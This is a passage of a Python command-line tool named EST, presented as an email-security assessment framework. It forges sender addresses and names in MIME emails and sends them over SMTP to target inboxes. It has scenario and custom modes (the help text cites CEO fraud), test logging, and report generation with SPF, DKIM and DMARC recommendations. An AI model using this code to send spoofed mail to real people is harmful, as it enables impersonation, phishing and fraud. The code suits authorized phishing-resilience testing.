570 | # Send via SMTP
571 | print("🚀 Initiating SMTP connection...")
572 | server = smtplib.SMTP(smtp_host, smtp_port, timeout=30)
573 |
574 | print("📤 Sending spoofed email...")
575 | server.sendmail(scenario.from_email, [target], email_content)
576 | server.quit()
577 |
578 | print("✅ Email spoofing test completed successfully!")
579 | print(f"📋 Check target inbox: {target}")
580 |
581 | # Log the test
582 | result = TestResult(
583 | timestamp=datetime.now().isoformat(),
584 | test_type="scenario_test",
585 | scenario=scenario.name,
586 | target=target,
587 | from_email=scenario.from_email,
588 | success=True,
589 | details={
590 | "category": scenario.category,
591 | "severity": scenario.severity,
592 | "smtp_server": f"{smtp_host}:{smtp_port}"
593 | }
594 | )
595 |
596 | self._log_test_result(result)
597 | return True
598 |
599 | except Exception as e:
600 | print(f"❌ Email spoofing test failed: {e}")
601 | print(f"💡 Verify SMTP server is running: est server --port {smtp_port}")
602 |
603 | # Log failed test
604 | result = TestResult(
605 | timestamp=datetime.now().isoformat(),
606 | test_type="scenario_test",
607 | scenario=scenario.name,
608 | target=target,
609 | from_email=scenario.from_email,
610 | success=False,
611 | details={
612 | "error": str(e),
613 | "smtp_server": f"{smtp_host}:{smtp_port}"
614 | }
615 | )
616 |
617 | self._log_test_result(result)
618 | return False
619 |
620 | def run_custom_test(self, from_email: str, from_name: str, subject: str,
621 | body: str, target: str, smtp_host: str = "localhost",
622 | smtp_port: int = 2525) -> bool:
623 | """Run custom spoofing test"""
624 | print(f"\n🎯 Executing Custom Email Spoofing Test")
625 | print(f"─" * 45)
626 | print(f"📤 Spoofed From: {from_name} <{from_email}>")
627 | print(f"📥 Target: {target}")
628 | print(f"📋 Subject: {subject}")
629 | print(f"📡 SMTP Server: {smtp_host}:{smtp_port}")
630 | print(f"🕐 Timestamp: {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}")
631 | print()
632 |
633 | try:
634 | # Create MIME email with proper encoding
635 | email_content = self._create_custom_mime_email(from_email, from_name, subject, body, target)
636 |
637 | print("🚀 Initiating SMTP connection...")
638 | server = smtplib.SMTP(smtp_host, smtp_port, timeout=30)
639 |
640 | print("📤 Sending custom spoofed email...")
641 | server.sendmail(from_email, [target], email_content)
642 | server.quit()
643 |
644 | print("✅ Custom email spoofing test completed successfully!")
645 | print(f"📋 Check target inbox: {target}")
646 |
647 | # Log the test
648 | result = TestResult(
649 | timestamp=datetime.now().isoformat(),
650 | test_type="custom_test",
651 | scenario="custom",
652 | target=target,
653 | from_email=from_email,
654 | success=True,
655 | details={
656 | "from_name": from_name,
657 | "subject": subject,
658 | "body_length": len(body),
659 | "smtp_server": f"{smtp_host}:{smtp_port}"
660 | }
661 | )
662 |
663 | self._log_test_result(result)
664 | return True
665 |
666 | except Exception as e:
667 | print(f"❌ Custom email spoofing test failed: {e}")
668 |
669 | # Log failed test
670 | result = TestResult(
671 | timestamp=datetime.now().isoformat(),
672 | test_type="custom_test",
673 | scenario="custom",
674 | target=target,
675 | from_email=from_email,
676 | success=False,
677 | details={
678 | "error": str(e),
679 | "smtp_server": f"{smtp_host}:{smtp_port}"
680 | }
681 | )
682 |
683 | self._log_test_result(result)
684 | return False
685 |
686 | def show_logs(self, lines: int = 20):
687 | """Display recent test logs"""
688 | if not self.config.log_file.exists():
689 | print("📝 No test logs found")
690 | print(f"💡 Run some tests first, then check: {self.config.log_file}")
691 | return
692 |
693 | print(f"\n📊 EST Security Test Logs (Last {lines} entries)")
694 | print("═" * 80)
695 |
696 | try:
697 | with open(self.config.log_file, 'r') as f:
698 | log_lines = f.readlines()
699 |
700 | recent_logs = log_lines[-lines:] if len(log_lines) > lines else log_lines
701 |
702 | for line in recent_logs:
703 | try:
704 | entry = json.loads(line.strip())
705 | timestamp = entry['timestamp'][:19].replace('T', ' ')
706 |
707 | status = "✅ SUCCESS" if entry['success'] else "❌ FAILED"
708 | test_type = entry['test_type'].replace('_', ' ').title()
709 |
710 | print(f"📅 {timestamp} | {status}")
711 | print(f"🎯 Test: {test_type} - {entry['scenario']}")
712 | print(f"📤 From: {entry['from_email']}")
713 | print(f"📥 Target: {entry['target']}")
714 |
715 | if 'details' in entry and entry['details']:
716 | details = entry['details']
717 | if 'category' in details:
718 | print(f"🏷️ Category: {details['category']}")
719 | if 'severity' in details:
720 | print(f"⚠️ Severity: {details['severity']}")
721 | if 'error' in details:
722 | print(f"❌ Error: {details['error']}")
723 |
724 | print("─" * 80)
725 |
726 | except json.JSONDecodeError:
727 | continue
728 |
729 | print(f"📈 Total log entries: {len(log_lines)}")
730 | print(f"📁 Full log file: {self.config.log_file}")
731 |
732 | except Exception as e:
733 | print(f"❌ Error reading logs: {e}")
734 |
735 | def generate_report(self, output_file: Optional[str] = None):
736 | """Generate comprehensive test report"""
737 | if not self.config.log_file.exists():
738 | print("❌ No test data available for report generation")
739 | return
740 |
741 | print("📊 Generating EST Security Assessment Report...")
742 |
743 | try:
744 | # Read all log entries
745 | with open(self.config.log_file, 'r') as f:
746 | log_entries = [json.loads(line.strip()) for line in f if line.strip()]
747 |
748 | if not log_entries:
749 | print("❌ No test data found in logs")
750 | return
751 |
752 | # Generate report
753 | report = self._create_report(log_entries)
754 |
755 | # Save report
756 | if not output_file:
757 | timestamp = datetime.now().strftime("%Y%m%d_%H%M%S")
758 | output_file = self.config.reports_dir / f"est_report_{timestamp}.json"
759 |
760 | with open(output_file, 'w') as f:
761 | json.dump(report, f, indent=2)
762 |
763 | print(f"✅ Report generated: {output_file}")
764 | self._print_report_summary(report)
765 |
766 | except Exception as e:
767 | print(f"❌ Report generation failed: {e}")
768 |
769 | def _create_report(self, log_entries: List[Dict]) -> Dict:
770 | """Create comprehensive assessment report"""
771 | total_tests = len(log_entries)
772 | successful_tests = sum(1 for entry in log_entries if entry['success'])
773 | failed_tests = total_tests - successful_tests
774 |
775 | # Analyze by test type
776 | test_types = {}
777 | for entry in log_entries:
778 | test_type = entry['test_type']
779 | if test_type not in test_types:
780 | test_types[test_type] = {'total': 0, 'success': 0}
781 | test_types[test_type]['total'] += 1
782 | if entry['success']:
783 | test_types[test_type]['success'] += 1
784 |
785 | # Analyze by scenario
786 | scenarios = {}
787 | for entry in log_entries:
788 | scenario = entry['scenario']
789 | if scenario not in scenarios:
790 | scenarios[scenario] = {'total': 0, 'success': 0}
791 | scenarios[scenario]['total'] += 1
792 | if entry['success']:
793 | scenarios[scenario]['success'] += 1
794 |
795 | # Time analysis
796 | timestamps = [entry['timestamp'] for entry in log_entries]
797 | first_test = min(timestamps) if timestamps else None
798 | last_test = max(timestamps) if timestamps else None
799 |
800 | return {
801 | "report_metadata": {
802 | "generated_at": datetime.now().isoformat(),
803 | "tool_version": __version__,
804 | "report_type": "EST Security Assessment",
805 | "total_tests": total_tests
806 | },
807 | "executive_summary": {
808 | "total_tests_conducted": total_tests,
809 | "successful_tests": successful_tests,
810 | "failed_tests": failed_tests,
811 | "success_rate": round((successful_tests / total_tests * 100), 2) if total_tests > 0 else 0,
812 | "test_period": {
813 | "first_test": first_test,
814 | "last_test": last_test
815 | }
816 | },
817 | "test_analysis": {
818 | "by_test_type": test_types,
819 | "by_scenario": scenarios
820 | },
821 | "detailed_logs": log_entries,
822 | "recommendations": self._generate_recommendations(log_entries)
823 | }
824 |
825 | def _generate_recommendations(self, log_entries: List[Dict]) -> List[str]:
826 | """Generate security recommendations based on test results"""
827 | recommendations = []
828 |
829 | successful_tests = sum(1 for entry in log_entries if entry['success'])
830 | total_tests = len(log_entries)
831 | success_rate = (successful_tests / total_tests * 100) if total_tests > 0 else 0
832 |
833 | if success_rate > 80:
834 | recommendations.extend([
835 | "🔴 CRITICAL: High email spoofing success rate detected",
836 | "Implement SPF, DKIM, and DMARC email authentication",
837 | "Configure email security gateways with spoofing detection",
838 | "Conduct immediate security awareness training"
839 | ])
840 | elif success_rate > 50:
841 | recommendations.extend([
842 | "🟠 HIGH: Moderate spoofing vulnerabilities identified",
843 | "Review and strengthen email authentication policies",
844 | "Implement additional email security controls",
845 | "Regular security awareness training recommended"
846 | ])
847 | else:
848 | recommendations.extend([
849 | "🟡 MEDIUM: Some spoofing attempts successful",
850 | "Continue monitoring email security controls",
851 | "Periodic security awareness refresher training",
852 | "Regular testing of email authentication mechanisms"
853 | ])
854 |
855 | recommendations.extend([
856 | "📚 Provide targeted training on identifying spoofed emails",
857 | "🔍 Implement email header analysis training",
858 | "⚡ Establish incident response procedures for email attacks",
859 | "📊 Regular penetration testing of email security controls"
860 | ])
861 |
862 | return recommendations
863 |
864 | def _print_report_summary(self, report: Dict):
865 | """Print report summary to console"""
866 | summary = report['executive_summary']
867 |
868 | print(f"\n📋 EST Security Assessment Summary")
869 | print("═" * 50)
870 | print(f"📊 Total Tests: {summary['total_tests_conducted']}")
871 | print(f"✅ Successful: {summary['successful_tests']}")
872 | print(f"❌ Failed: {summary['failed_tests']}")
873 | print(f"📈 Success Rate: {summary['success_rate']}%")
874 |
875 | if summary['success_rate'] > 80:
876 | print("🔴 Risk Level: CRITICAL - Immediate action required")
877 | elif summary['success_rate'] > 50:
878 | print("🟠 Risk Level: HIGH - Remediation recommended")
879 | else:
880 | print("🟡 Risk Level: MEDIUM - Monitoring advised")
881 |
882 | print(f"\n📚 Recommendations: {len(report['recommendations'])} items")
883 | for rec in report['recommendations'][:3]:
884 | print(f" • {rec}")
885 | if len(report['recommendations']) > 3:
886 | print(f" ... and {len(report['recommendations']) - 3} more")
887 |
888 | def _create_mime_email(self, scenario: EmailScenario, target: str) -> str:
889 | """Create professional MIME email content with proper encoding"""
890 | try:
891 | # Create MIME message
892 | msg = MIMEMultipart('alternative')
893 |
894 | # Set headers with proper encoding
895 | msg['From'] = f"{scenario.from_name} <{scenario.from_email}>"
896 | msg['To'] = target
897 | msg['Subject'] = Header(scenario.subject, 'utf-8')
898 | msg['Date'] = formatdate(localtime=True)
899 | msg['Message-ID'] = email.utils.make_msgid(domain=scenario.from_email.split('@')[1])
900 |
901 | # Create email body with disclaimer
902 | email_body = f"""{scenario.body}
903 |
904 | ────────────────────────────────────────────────────────────────
905 | This email was sent using EST (Email Spoofing Tool) for authorized
906 | security testing purposes. If you received this email unexpectedly,
907 | please contact your IT security team immediately.
908 |
909 | Test Details:
910 | • Scenario: {scenario.name}
911 | • Category: {scenario.category}
912 | • Severity: {scenario.severity}
913 | • Timestamp: {datetime.now().isoformat()}
914 |
915 | EST v{__version__} - Professional Email Security Assessment Framework
916 | ────────────────────────────────────────────────────────────────"""
917 |
918 | # Create text part with proper encoding
919 | text_part = MIMEText(email_body, 'plain', 'utf-8')
920 | msg.attach(text_part)
921 |
922 | return msg.as_string()
923 |
924 | except Exception as e:
925 | self.config.logger.error(f"MIME email creation failed: {e}")
926 | # Fallback to simple string method
927 | return self._create_simple_email(scenario, target)
928 |
929 | def _create_custom_mime_email(self, from_email: str, from_name: str, subject: str, body: str, target: str) -> str:
930 | """Create custom MIME email with proper encoding"""
931 | try:
932 | # Create MIME message
933 | msg = MIMEMultipart('alternative')
934 |
935 | # Set headers with proper encoding
936 | msg['From'] = f"{from_name} <{from_email}>"
937 | msg['To'] = target
938 | msg['Subject'] = Header(subject, 'utf-8')
939 | msg['Date'] = formatdate(localtime=True)
940 | msg['Message-ID'] = email.utils.make_msgid(domain=from_email.split('@')[1])
941 |
942 | # Create email body with disclaimer
943 | email_body = f"""{body}
944 |
945 | ────────────────────────────────────────────────────────────────
946 | This email was sent using EST (Email Spoofing Tool) for authorized
947 | security testing purposes. If you received this email unexpectedly,
948 | please contact your IT security team immediately.
949 |
950 | EST v{__version__} - Professional Email Security Assessment Framework
951 | ────────────────────────────────────────────────────────────────"""
952 |
953 | # Create text part with proper encoding
954 | text_part = MIMEText(email_body, 'plain', 'utf-8')
955 | msg.attach(text_part)
956 |
957 | return msg.as_string()
958 |
959 | except Exception as e:
960 | self.config.logger.error(f"Custom MIME email creation failed: {e}")
961 | # Fallback to simple string method
962 | return self._create_simple_custom_email(from_email, from_name, subject, body, target)
963 |
964 | def _create_simple_email(self, scenario: EmailScenario, target: str) -> str:
965 | """Fallback method to create simple email content"""
966 | return f"""From: {scenario.from_name} <{scenario.from_email}>
967 | To: {target}
968 | Subject: {scenario.subject}
969 | Date: {datetime.now().strftime('%a, %d %b %Y %H:%M:%S %z')}
970 | Message-ID: <{int(time.time())}.{hash(target) % 10000}@{scenario.from_email.split('@')[1]}>
971 | MIME-Version: 1.0
972 | Content-Type: text/plain; charset=UTF-8
973 |
974 | {scenario.body}
975 |
976 | ────────────────────────────────────────────────────────────────
977 | This email was sent using EST (Email Spoofing Tool) for authorized
978 | security testing purposes. If you received this email unexpectedly,
979 | please contact your IT security team immediately.
980 |
981 | Test Details:
982 | • Scenario: {scenario.name}
983 | • Category: {scenario.category}
984 | • Severity: {scenario.severity}
985 | • Timestamp: {datetime.now().isoformat()}
986 |
987 | EST v{__version__} - Professional Email Security Assessment Framework
988 | ────────────────────────────────────────────────────────────────
989 | """
990 |
991 | def _create_simple_custom_email(self, from_email: str, from_name: str, subject: str, body: str, target: str) -> str:
992 | """Fallback method to create simple custom email content"""
993 | return f"""From: {from_name} <{from_email}>
994 | To: {target}
995 | Subject: {subject}
996 | Date: {datetime.now().strftime('%a, %d %b %Y %H:%M:%S %z')}
997 | Message-ID: <{int(time.time())}.{hash(target) % 10000}@{from_email.split('@')[1]}>
998 | MIME-Version: 1.0
999 | Content-Type: text/plain; charset=UTF-8
1000 |
1001 | {body}
1002 |
1003 | ────────────────────────────────────────────────────────────────
1004 | This email was sent using EST (Email Spoofing Tool) for authorized
1005 | security testing purposes. If you received this email unexpectedly,
1006 | please contact your IT security team immediately.
1007 |
1008 | EST v{__version__} - Professional Email Security Assessment Framework
1009 | ────────────────────────────────────────────────────────────────
1010 | """
1011 |
1012 | def _log_test_result(self, result: TestResult):
1013 | """Log test result"""
1014 | try:
1015 | log_entry = {
1016 | "timestamp": result.timestamp,
1017 | "test_type": result.test_type,
1018 | "scenario": result.scenario,
1019 | "target": result.target,
1020 | "from_email": result.from_email,
1021 | "success": result.success,
1022 | "details": result.details
1023 | }
1024 |
1025 | with open(self.config.log_file, 'a') as f:
1026 | f.write(json.dumps(log_entry) + '\n')
1027 |
1028 | self.config.logger.info(f"Test logged: {result.test_type} - {result.scenario}")
1029 |
1030 | except Exception as e:
1031 | self.config.logger.error(f"Failed to log test result: {e}")
1032 |
1033 | def main():
1034 | """Main application entry point"""
1035 | parser = argparse.ArgumentParser(
1036 | prog='est',
1037 | description='EST - Professional Email Spoofing Tool for Security Assessment',
1038 | formatter_class=argparse.RawDescriptionHelpFormatter,
1039 | epilog=f"""
1040 | Examples:
1041 | est server --port 2525 Start SMTP testing server
1042 | est list List available spoofing scenarios
1043 | est test 1 target@company.com Run CEO fraud scenario
1044 | est custom --from-email "ceo@company.com" \\
1045 | --from-name "John Smith" \\
1046 | --subject "Urgent Request" \\
1047 | --body "Please handle this" \\
1048 | --target "user@company.com" Run custom spoofing test
1049 | est logs --lines 50 View recent test logs
1050 | est report Generate assessment report
1051 |
1052 | EST v{__version__} - Professional Email Security Assessment Framework
1053 | Author: {__author__} | License: {__license__}
1054 |
1055 | ⚠️ LEGAL NOTICE: For authorized security testing only.
1056 | Obtain explicit written permission before testing any systems.
1057 | """
1058 | )
1059 |
1060 | parser.add_argument('--version', action='version', version=f'EST v{__version__}')
1061 |
1062 | subparsers = parser.add_subparsers(dest='command', help='Available commands')
1063 |
1064 | # Server command
1065 | server_parser = subparsers.add_parser('server', help='Start SMTP testing server')
1066 | server_parser.add_argument('--host', default='0.0.0.0',
1067 | help='Host to bind to (default: 0.0.0.0)')
1068 | server_parser.add_argument('--port', type=int, default=2525,
1069 | help='Port to bind to (default: 2525)')
1070 |
1071 | # List command
1072 | subparsers.add_parser('list', help='List available spoofing scenarios')
1073 |
1074 | # Test command
1075 | test_parser = subparsers.add_parser('test', help='Run spoofing scenario')
1076 | test_parser.add_argument('scenario', type=int,
1077 | help='Scenario ID (use "list" to see available)')
1078 | test_parser.add_argument('target', help='Target email address')
1079 | test_parser.add_argument('--smtp-host', default='localhost',
1080 | help='SMTP server hostname (default: localhost)')
1081 | test_parser.add_argument('--smtp-port', type=int, default=2525,
1082 | help='SMTP server port (default: 2525)')
1083 |
1084 | # Custom test command
1085 | custom_parser = subparsers.add_parser('custom', help='Run custom spoofing test')
1086 | custom_parser.add_argument('--from-email', required=True,
1087 | help='Spoofed sender email address')
1088 | custom_parser.add_argument('--from-name', required=True,
1089 | help='Spoofed sender display name')
1090 | custom_parser.add_argument('--subject', required=True,
1091 | help='Email subject line')
1092 | custom_parser.add_argument('--body', required=True,
1093 | help='Email body content')
1094 | custom_parser.add_argument('--target', required=True,
1095 | help='Target email address')
1096 | custom_parser.add_argument('--smtp-host', default='localhost',
1097 | help='SMTP server hostname (default: localhost)')
1098 | custom_parser.add_argument('--smtp-port', type=int, default=2525,
1099 | help='SMTP server port (default: 2525)')
1100 |
1101 | # Logs command
1102 | logs_parser = subparsers.add_parser('logs', help='View test logs')
1103 | logs_parser.add_argument('--lines', type=int, default=20,
1104 | help='Number of recent log entries to display (default: 20)')
1105 |
1106 | # Report command
1107 | report_parser = subparsers.add_parser('report', help='Generate assessment report')
1108 | report_parser.add_argument('--output', help='Output file path (default: auto-generated)')
1109 |
1110 | args = parser.parse_args()
1111 |
1112 | # Initialize EST
1113 | est = EST()
1114 |
1115 | # Handle commands
1116 | if not args.command:
1117 | est.print_banner()
1118 | parser.print_help()
1119 | return
1120 |
1121 | if args.command == 'server':
1122 | # Check port permissions
1123 | if args.port <= 1024 and os.geteuid() != 0:
1124 | print(f"❌ Port {args.port} requires root privileges!")
1125 | print(f"💡 Solutions:")
1126 | print(f" 1. Run as root: sudo est server --port {args.port}")
1127 | print(f" 2. Use unprivileged port: est server --port 2525")
1128 | sys.exit(1)
1129 |
1130 | server = SMTPTestServer(args.host, args.port, est.config)
1131 | try:
1132 | server.start()
1133 | except KeyboardInterrupt:
1134 | pass
1135 |
1136 | elif args.command == 'list':
1137 | est.print_banner()
1138 | est.list_scenarios()
1139 |
1140 | elif args.command == 'test':
1141 | est.print_banner()
1142 | success = est.run_scenario(args.scenario, args.target, args.smtp_host, args.smtp_port)
1143 | sys.exit(0 if success else 1)
1144 |
1145 | elif args.command == 'custom':
1146 | est.print_banner()
1147 | success = est.run_custom_test(
1148 | args.from_email, args.from_name, args.subject,
1149 | args.body, args.target, args.smtp_host, args.smtp_port
1150 | )
1151 | sys.exit(0 if success else 1)
1152 |
1153 | elif args.command == 'logs':
1154 | est.print_banner()
1155 | est.show_logs(args.lines)
1156 |
1157 | elif args.command == 'report':
1158 | est.print_banner()
1159 | est.generate_report(args.output)
1160 |
1161 | if __name__ == "__main__":
1162 | main()
--------------------------------------------------------------------------------